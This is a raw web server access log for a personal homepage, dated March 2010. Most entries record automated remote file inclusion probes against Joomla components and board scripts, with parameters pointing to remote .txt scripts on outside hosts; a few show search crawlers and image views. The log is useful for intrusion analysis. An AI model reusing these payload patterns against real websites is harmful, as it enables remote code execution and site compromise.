216.122.251.114 - - [02/Mar/2010:02:47:38 -0800] "GET /~daveh/logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
216.122.251.114 - - [02/Mar/2010:02:48:28 -0800] "GET /~daveh/logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
216.122.251.114 - - [02/Mar/2010:02:48:28 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
216.122.251.114 - - [02/Mar/2010:02:48:28 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.143.198 - - [02/Mar/2010:03:19:58 -0800] "GET /~daveh//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.143.198 - - [02/Mar/2010:03:19:58 -0800] "GET /~daveh/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 352 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:03:21:48 -0800] "GET /%7edaveh/sean/song/pbsong0.html HTTP/1.0" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
202.160.180.64 - - [02/Mar/2010:03:29:14 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.0" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.accesscom.com
66.102.237.18 - - [02/Mar/2010:03:48:06 -0800] "GET /~daveh/delete_all.php?board_skin_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
66.102.237.18 - - [02/Mar/2010:03:48:06 -0800] "GET /~daveh/logs/delete_all.php?board_skin_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/logs/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
66.102.237.18 - - [02/Mar/2010:03:48:06 -0800] "GET /~daveh/logs/access.log%20%20/delete_all.php?board_skin_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:08:32 -0800] "GET /~daveh////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:08:32 -0800] "GET /~daveh/logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:08:32 -0800] "GET /~daveh/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 345 /home/users/d/daveh/public_html/logs////components "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:09:24 -0800] "GET /~daveh/logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 345 /home/users/d/daveh/public_html/logs////components "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:09:24 -0800] "GET /~daveh////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:09:24 -0800] "GET /~daveh/logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:36:16 -0800] "GET /~daveh//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:36:16 -0800] "GET /~daveh/logs//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:36:16 -0800] "GET /~daveh/logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:37:45 -0800] "GET /~daveh//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:37:46 -0800] "GET /~daveh/logs//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:37:46 -0800] "GET /~daveh/logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://idscan.fileave.com/id1.txt? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:37:51 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:37:51 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:37:51 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
58.69.180.194 - - [02/Mar/2010:04:37:53 -0800] "GET /~daveh?M=A HTTP/1.1" 301 326 /home/users/d/daveh/public_html "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dpink%2Bsunset%26fr%3Dsfp%26fr2%3Dxpl&w=1280&h=960&imgurl=www.accesscom.com%2F%7Edaveh%2Fsunset-glare.jpg&rurl=http%3A%2F%2Fwww.accesscom.com%2F%7Edaveh%3FM%3DA&size=201k&name=sunset+glare+jpg&p=pink+sunset&oid=4ff2f59ac5aab0e2&fr2=xpl&no=1&tt=272317&sigr=1
58.69.180.194 - - [02/Mar/2010:04:37:53 -0800] "GET /~daveh/?M=A HTTP/1.1" 200 2787 /home/users/d/daveh/public_html/ "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dpink%2Bsunset%26fr%3Dsfp%26fr2%3Dxpl&w=1280&h=960&imgurl=www.accesscom.com%2F%7Edaveh%2Fsunset-glare.jpg&rurl=http%3A%2F%2Fwww.accesscom.com%2F%7Edaveh%3FM%3DA&size=201k&name=sunset+glare+jpg&p=pink+sunset&oid=4ff2f59ac5aab0e2&fr2=xpl&no=1&tt=272317&si
83.103.72.130 - - [02/Mar/2010:04:37:59 -0800] "GET /~daveh//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:37:59 -0800] "GET /~daveh/logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:37:59 -0800] "GET /~daveh/logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//board "-" "Mozilla/5.0" 0 www.accesscom.com
58.69.180.194 - - [02/Mar/2010:04:37:59 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 206184 /home/users/d/daveh/public_html/sunset-glare.jpg "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dpink%2Bsunset%26fr%3Dsfp%26fr2%3Dxpl&w=1280&h=960&imgurl=www.accesscom.com%2F%7Edaveh%2Fsunset-glare.jpg&rurl=http%3A%2F%2Fwww.accesscom.com%2F%7Edaveh%3FM%3DA&size=201k&name=sunset+glare+jpg&p=pink+sunset&
83.103.72.130 - - [02/Mar/2010:04:38:00 -0800] "GET /~daveh/logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:38:00 -0800] "GET /~daveh/logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:38:03 -0800] "GET /~daveh//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:38:19 -0800] "GET /~daveh//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:38:19 -0800] "GET /~daveh/logs//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs//board "-" "Mozilla/5.0" 0 www.accesscom.com
83.103.72.130 - - [02/Mar/2010:04:38:20 -0800] "GET /~daveh/logs/access.log%20%20//board/bbs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
58.69.180.194 - - [02/Mar/2010:04:38:21 -0800] "GET /~daveh?M=A HTTP/1.1" 301 326 /home/users/d/daveh/public_html "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dpink%2Bsunset%26fr%3Dsfp%26fr2%3Dxpl&w=1280&h=960&imgurl=www.accesscom.com%2F%7Edaveh%2Fsunset-glare.jpg&rurl=http%3A%2F%2Fwww.accesscom.com%2F%7Edaveh%3FM%3DA&size=201k&name=sunset+glare+jpg&p=pink+sunset&oid=4ff2f59ac5aab0e2&fr2=xpl&no=1&tt=272317&sigr=1
194.39.140.100 - - [02/Mar/2010:04:39:09 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:39:10 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:39:10 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:39 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:40 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 1 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:40 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:50 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:50 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:04:46:51 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
123.143.29.250 - - [02/Mar/2010:04:49:16 -0800] "GET /~daveh/logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 374 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
123.143.29.250 - - [02/Mar/2010:04:49:16 -0800] "GET /~daveh/logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 363 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
123.143.29.250 - - [02/Mar/2010:04:49:16 -0800] "GET /~daveh/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:50:16 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:50:16 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:50:21 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:04:53:15 -0800] "GET /~daveh/logs/access.log///write_update.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:04:53:15 -0800] "GET /~daveh///write_update.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/write_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:04:53:15 -0800] "GET /~daveh/logs///write_update.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs///write_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:53:39 -0800] "GET /~daveh/logs/access.log%20%20//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:53:39 -0800] "GET /~daveh/logs//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 302 /home/users/d/daveh/public_html/logs//login.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:53:39 -0800] "GET /~daveh//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 297 /home/users/d/daveh/public_html/login.php "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:55 -0800] "GET /~daveh////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2808 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 13301 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2808 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 13301 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh////////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 2808 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs/access.log%20%20////////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:54:56 -0800] "GET /~daveh/logs////////////////?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 13301 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:55:06 -0800] "GET /~daveh/logs//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 302 /home/users/d/daveh/public_html/logs//login.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:55:06 -0800] "GET /~daveh/logs/access.log%20%20//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:04:55:06 -0800] "GET /~daveh//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 297 /home/users/d/daveh/public_html/login.php "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:55:45 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:55:45 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:04:55:45 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:48 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:48 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:48 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:51 -0800] "GET /~daveh///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:51 -0800] "GET /~daveh/logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:04:55:51 -0800] "GET /~daveh/logs///yuboard/delete_comment.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 320 /home/users/d/daveh/public_html/logs///yuboard "-" "Mozilla/5.0" 0 www.accesscom.com
120.28.86.173 - - [02/Mar/2010:04:56:20 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 206184 /home/users/d/daveh/public_html/sunset-glare.jpg "http://profiles.friendster.com/44741246" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:00:55 -0800] "GET /~daveh/logs/access.log///board/bbs/delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:00:55 -0800] "GET /~daveh///board/bbs/delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 313 /home/users/d/daveh/public_html/board "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:00:55 -0800] "GET /~daveh/logs///board/bbs/delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/logs///board "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:05:03:35 -0800] "GET /~daveh/photos/?S=D HTTP/1.0" 200 1280 /home/users/d/daveh/public_html/photos/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:05:04:18 -0800] "GET /~daveh//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 297 /home/users/d/daveh/public_html/login.php "-" "Mozilla/5.0" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:05:04:18 -0800] "GET /~daveh/logs/access.log%20%20//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:05:04:18 -0800] "GET /~daveh/logs//login.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 302 /home/users/d/daveh/public_html/logs//login.php "-" "Mozilla/5.0" 0 www.accesscom.com
123.143.29.250 - - [02/Mar/2010:05:05:33 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 376 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:05:12:03 -0800] "GET /~daveh/logs//include/print_category.php?setup[use_category]=1&dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//include "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:05:12:03 -0800] "GET /~daveh/logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 332 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:05:12:03 -0800] "GET /~daveh//include/print_category.php?setup[use_category]=1&dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/include "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Mar/2010:05:14:20 -0800] "GET /~daveh/logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 332 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Mar/2010:05:14:20 -0800] "GET /~daveh//include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/include "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Mar/2010:05:14:20 -0800] "GET /~daveh/logs//include/print_category.php?setup[use_category]=1&dir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//include "-" "Mozilla/5.0" 0 www.accesscom.com
